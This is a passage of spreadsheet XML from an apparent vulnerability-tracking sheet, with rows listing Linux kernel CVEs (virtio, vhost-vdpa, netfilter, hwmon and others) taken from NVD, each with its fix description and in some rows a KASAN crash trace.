      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr"/>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_input: reset device if input_register_device() fails
Probe marks the device DRIVER_OK with virtio_device_ready() before
calling input_register_device(). If registration fails, the error path
cleared vi-&gt;ready and called del_vqs() while the device was still live,
so the device could keep DMA to queues that were already torn down.
Match remove/freeze: call virtio_reset_device() on that path before
tearing down the virtqueues.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97987</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97988</t>
        </is>
      </c>
      <c r="D628" s="5" t="inlineStr"/>
      <c r="E628" s="5" t="inlineStr"/>
      <c r="F628" s="5" t="inlineStr"/>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="inlineStr"/>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr"/>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost: invalidate vring access on IOTLB transitions
When VIRTIO_F_ACCESS_PLATFORM changes, cached vring pointers and IOTLB
metadata are interpreted in a different address space. Keeping them
across the transition can leave stale ring mappings in use.
Clearing d-&gt;iotlb before taking the VQ locks also lets a worker observe
a transient NULL d-&gt;iotlb and fall back to d-&gt;umem while translating a
descriptor.
Add a common vhost_clear_device_iotlb() helper for vhost-net and
vhost-vsock. Take all VQ mutexes in index order before dropping the
device-wide IOTLB, invalidate each VQ's cached ring access and metadata,
clear pending IOTLB messages, and free the old table after the handoff.
This serializes the transition with workers and prevents mixed address
space mappings.
On the first direct-to-IOTLB transition, invalidate the cached vring
addresses. When an existing device IOTLB is replaced, preserve the
GIOVA ring addresses and reset only the metadata cache. After clearing
ACCESS_PLATFORM, userspace must configure the vring addresses for the
new address mode.
vhost_vq_invalidate_access() clears desc, avail, and used together.
Treat the VQ as invalidated only when all three are NULL, since a single
GIOVA address may legitimately be zero.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97988</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97989</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="inlineStr"/>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr"/>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vduse: validate virtqueue alignment
vduse_validate_config() only checks the upper bound of vq_align. Invalid
values can therefore reach vring_create_virtqueue_map(). The split-ring
helpers use align - 1 as a bit mask, so the alignment must be a non-zero
power of two. A zero value makes vring_size() drop the descriptor and
available-ring part and vring_init() leave the used ring pointer NULL.
The VIRTIO spec requires the used ring to start at an address
aligned to at least 4 bytes. Reject values below VRING_USED_ALIGN_SIZE as
well as non-power-of-two values before they reach the virtio ring helpers.
Opening a virtio-net device created with vq_align=0 triggered:
BUG: KASAN: null-ptr-deref in virtqueue_kick_prepare_split+0xe3/0x100
Read of size 2 at addr 0000000000000000 by task systemd-network/1062
Call Trace (relevant frames):
 dump_stack_lvl
 print_report
 kasan_report
 __asan_load2
 virtqueue_kick_prepare_split+0xe3/0x100
 virtqueue_kick_prepare+0x40/0x60
 try_fill_recv+0x857/0x1250
 virtnet_open+0x189/0x460
 __dev_open+0x225/0x390
 __dev_change_flags+0x368/0x3b0
 netif_change_flags+0x56/0xc0
 do_setlink.isra.0+0x68c/0x1e30
Validate the value before it reaches the virtio ring helpers.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97989</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97992</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr"/>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost-vdpa: protect config_ctx from being freed under the config callback
vhost_vdpa_config_cb() loads v-&gt;config_ctx and signals it without taking
a reference and without holding any lock:
	struct eventfd_ctx *config_ctx = v-&gt;config_ctx;
	if (config_ctx)
		eventfd_signal(config_ctx);
VHOST_VDPA_SET_CONFIG_CALL replaces that field and drops what is normally
the last reference to the old context:
	swap(ctx, v-&gt;config_ctx);
	if (ctx)
		eventfd_ctx_put(ctx);
eventfd_ctx_put() drops the last kref and frees the context immediately,
with no RCU grace period, so a callback that has already loaded the
pointer goes on to dereference freed memory.  The two sides share no
lock: the ioctl runs under vhost_dev.mutex, while the parent invokes the
callback from its own interrupt or workqueue context.
This is not the reopen refcount underflow fixed by commit f6bbf0010ba0
("vhost-vdpa: fix use-after-free of v-&gt;config_ctx"), which was about
vhost_vdpa_config_put() leaving a stale pointer behind.  Here the pointer
is maintained correctly and it is the read side that is unprotected.
With VDUSE as the parent this is reachable from userspace with access to
/dev/vduse (root by default).  VDUSE_DEV_INJECT_CONFIG_IRQ queues
dev-&gt;inject, and vduse_dev_irq_inject() runs the callback under VDUSE's
own dev-&gt;irq_lock, which vhost does not hold.  vduse_dev_reset() does
flush_work(&amp;dev-&gt;inject), but VHOST_VDPA_SET_CONFIG_CALL never goes
through reset, so an inject already in flight is not waited for.  A
process that injects config interrupts on the VDUSE fd while another
thread swaps the call fd on the vhost-vdpa fd hits it in seconds:
  BUG: KASAN: slab-use-after-free in native_queued_spin_lock_slowpath
  Read of size 4 at addr ffff888107d21808 by task kworker/u17:1/2993
  Workqueue: vduse-irq vduse_dev_irq_inject
  Call Trace:
   native_queued_spin_lock_slowpath+0x97/0x5b0
   _raw_spin_lock_irqsave+0xd4/0xe0
   eventfd_signal_mask+0x69/0x120
   vhost_vdpa_config_cb+0x34/0x50
   vduse_dev_irq_inject+0x46/0x60
   process_one_work+0x468/0x950
  Allocated by task 2992:
   do_eventfd+0x50/0x200
   __x64_sys_eventfd2+0x2e/0x40
  Freed by task 2992:
   eventfd_ctx_put+0xb9/0xc0
   vhost_vdpa_unlocked_ioctl+0x116c/0x2190
Add a spinlock covering every access to config_ctx, so the callback
either signals a context that is still alive or observes NULL, and the
put happens only once no callback can reach the old value.
Clearing the parent's callback before the put would not be enough: of the
in-tree set_config_cb() implementations only VDUSE takes a lock, the rest
store the pointer unlocked, so that would not order against an in-flight
invocation.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97992</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97993</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost-vdpa: don't install the eventfd_ctx_fdget() error in config_ctx
vhost_vdpa_set_config_call() swaps the eventfd_ctx_fdget() return value
into v-&gt;config_ctx before checking it, so on failure the field briefly
holds an ERR_PTR:
	ctx = fd == VHOST_FILE_UNBIND ? NULL : eventfd_ctx_fdget(fd);
	swap(ctx, v-&gt;config_ctx);
	if (!IS_ERR_OR_NULL(ctx))
		eventfd_ctx_put(ctx);
	if (IS_ERR(v-&gt;config_ctx)) {
		long ret = PTR_ERR(v-&gt;config_ctx);
		v-&gt;config_ctx = NULL;
		return ret;
	}
Commit 0bde59c1723a ("vhost-vdpa: set v-&gt;config_ctx to NULL if
eventfd_ctx_fdget() fails") added that clearing, and spelled out the
invariant the rest of the file relies on: "we consider 'v-&gt;config_ctx'
valid if it is not NULL".  The window between the swap and the clearing
still breaks it.  vhost_vdpa_config_cb() only tests for NULL, so a config
interrupt delivered inside the window hands the ERR_PTR to
eventfd_signal().
Check the fd before installing it instead.  That closes the window and
matches how vhost_vring_ioctl() handles the same failure for the vq call
fd.
It also stops a rejected fd from tearing down a config interrupt that was
working: until now the swap replaced the live context and put it, so
after an EBADF the device silently stopped delivering config interrupts
until userspace installed a new fd.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97993</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97994</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vhost/vdpa: reject VRING_NUM larger than device max
vhost_vring_set_num() accepts any non-zero power-of-two queue size that
fits in 16 bits. vhost-vdpa then passes that value to set_vq_num()
without comparing it with get_vq_num_max().
A process with access to /dev/vhost-vdpa-* can therefore configure a
queue larger than the device advertises. With vdpa_sim, the worker can
walk descriptors beyond the mapped descriptor ring. KASAN reports a
16-byte out-of-bounds read, corresponding to one vring_desc, in the
vringh IOTLB path:
  BUG: KASAN: out-of-bounds in _copy_from_iter
  Read of size 16
  copy_from_iotlb
  copydesc_iotlb
  vringh_getdesc_iotlb
  vdpasim_net_work
Cache get_vq_num_max() immediately after reset. Some backends derive
it from writable queue-size state, so querying it after SET_NUM may
return the current size instead of the device capability. Invalidate
the cached value before reset so a failed reset leaves SET_NUM
disabled.
For VHOST_SET_VRING_NUM, copy the complete vring state once and use
the same index and size for validation, vq-&gt;num, and set_vq_num().
This ensures that validation and use operate on the same copied values.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97994</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97995</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="inlineStr"/>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_console: do not free control-out buffers on remove
__send_control_msg() publishes &amp;portdev-&gt;cpkt as the control-out
virtqueue cookie. remove_vqs() walks every virtqueue and passes leftover
cookies to free_buf(), which treats them as struct port_buffer and
reads sgpages.
If a control message is still on c_ovq when the device is unbound,
free_buf() reads past the ports_device object.
KASAN reported slab-out-of-bounds in free_buf():
	free_buf
	remove_vqs
	virtcons_remove
	unbind_store
The object was the ports_device allocated in virtcons_probe().
Drain c_ovq without freeing. The packet lives in portdev and is released
with it.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97995</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97996</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio: fix use-after-free in unregister_virtio_device()
device_unregister() is device_del() plus put_device(). When the caller
holds no extra reference, that drops the last one and runs the release
callback, which for several transports frees the memory the embedded
struct virtio_device sits in. unregister_virtio_device() then calls
virtio_debug_device_exit(), which reads dev-&gt;debugfs_dir out of the freed
object.
Affected transports are the ones whose release callback frees and whose
remove path takes no reference: virtio_mmio, virtio_vdpa, virtio_uml,
mlxbf-tmfifo and virtio_ccw. virtio_pci is unaffected because
virtio_pci_remove() brackets the call with get_device() and put_device().
Remove the debugfs entries before the device can go away. They are only
accessed through the protected debugfs interface, so
debugfs_remove_recursive() waits for in-progress file operations before
returning. Tearing them down while the device is still alive is therefore
safe.
Reproduced on User-Mode Linux with CONFIG_KASAN and CONFIG_VIRTIO_DEBUG
by unbinding a virtio-uml device:
  BUG: KASAN: slab-use-after-free in virtio_debug_device_exit+0x36/0x4d
  Read of size 8 at addr 00000000616e0b10 by task init/1
   __asan_report_load8_noabort
   virtio_debug_device_exit+0x36/0x4d
   unregister_virtio_device+0x48/0x75
   virtio_uml_remove
   platform_remove
   device_release_driver_internal
   unbind_store
  Freed by task 1:
   kfree
   virtio_uml_release_dev
   device_release
   kobject_put
   put_device
   device_unregister
With this applied, the report is gone and unbind is clean.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97996</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97997</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="inlineStr"/>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_ring: fix stale descriptor flags after a failed packed add
In a packed ring the AVAIL and USED bits sit in the descriptor itself,
so writing them makes that descriptor available. Those bit combinations
flip meaning on every round of the ring, tracked by a wrap counter, so
invalidating or validating a descriptor means inverting both bits.
Commit 1ce9e6055fa0 ("virtio_ring: introduce packed ring support") has
virtqueue_add_packed() make every descriptor of a chain available as it
maps the chain, and write the head last. The device consumes the ring in
order and stops at a head that is not available yet, so it never reaches
the rest.
When vring_map_one_sg() fails partway, unmap_release unmaps the segments
and restores avail_used_flags, but the descriptors it wrote to in the
ring stay marked with AVAIL and USED bits. The head is now the only
entry that keeps the device from consuming these stale entries.
For example, the ring would look like this now.
  Z - pre-previous command
  A - previous command
  B - aborted command
  C - current command
  [A1 DONE] [A2 DONE] &lt;C1 EMPTY&gt; [B2] [B3] [Z1 DONE]
When the driver now attempts to issue the C command, the next add starts
at the same head as B. If C spans less descriptors than B, there is no
end marker because AVAIL and USED bits were still in place. And that
means the device will start interpreting these stale entries (B2/B3) as
another command entry, which then blocks the queue.
This effect typically happens in swiotlb configurations under memory
pressure, because vring_map_one_sg() can then fail with larger I/O
requests which then leads to command abortions.
There are broadly 2 ways to avoid leaving those flags behind:
  1) Defer those flags too until the chain is complete.
  2) Rewrite those flags for the previous wrap counter.
Implement the second option in both packed add paths. The first option
traverses the chain a second time on every successful add. The second
option invalidates all added descriptors when any add fails.
With this patch applied, a packed virtqueue keeps completing requests
after a failed add.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97997</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97998</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="inlineStr"/>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nfnetlink_log: cope with concurrent instance destruction
Instances are refcounted. However, only memory release happens on the
1 -&gt; 0 transition; the unlink from hashes can occur with any refcount.
Uncooperative userspace can force a situation where a queue is pending
for destruction from netlink event while a different socket with same
portid processes an UNBIND request.
With right timing, this will unhash the instance again:
Oops: general protection fault, [..]
Call Trace:
 &lt;TASK&gt;
 nfulnl_recv_config+0x31a/0xd50
 nfnetlink_rcv_msg+0x7c2/0xeb0</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97998</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98000</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: Fix potential UAF in pec_store
Sashiko reports:
In pec_store(), a guard(mutex)(&amp;hwdev-&gt;lock) is taken. If the chip write
operation returns an error other than -EOPNOTSUPP, the code jumps to the
put label, which calls put_device(hdev). If this drops the final reference,
the device is freed. When the function then returns, the guard cleanup
function runs and attempts to unlock the freed mutex.
Use scoped_guard() instead of guard() to avoid the problem.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98000</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98001</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="inlineStr"/>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (ltc4282) Make sure clk_init_data is fully initialized
The clk_init_data structure contains several mutually-exclusive members
for different methods to specify the possible parents of a clock,
prompting drivers to initialize only the members they need.  However,
not initializing all members may cause subtle issues, which are only
exposed when CONFIG_INIT_STACK_ALL_PATTERN or CONFIG_INIT_STACK_NONE is
enabled.
ltc428_clk_provider_setup() does not fill in any parent clocks, and
assumes that init.num_parents is NULL.  However, the latter in
uninitialized, and thus may cause a crash.
Make sure all members are fully initialized, to fix such bugs, and to
avoid future breakage when converting drivers to a different method for
specifying the parents.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98001</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98003</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="inlineStr"/>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/amd: Do not reallocate GA log buffers on resume
Commit c5e1a1eb9279 ("iommu/amd: Simplify and Consolidate Virtual APIC
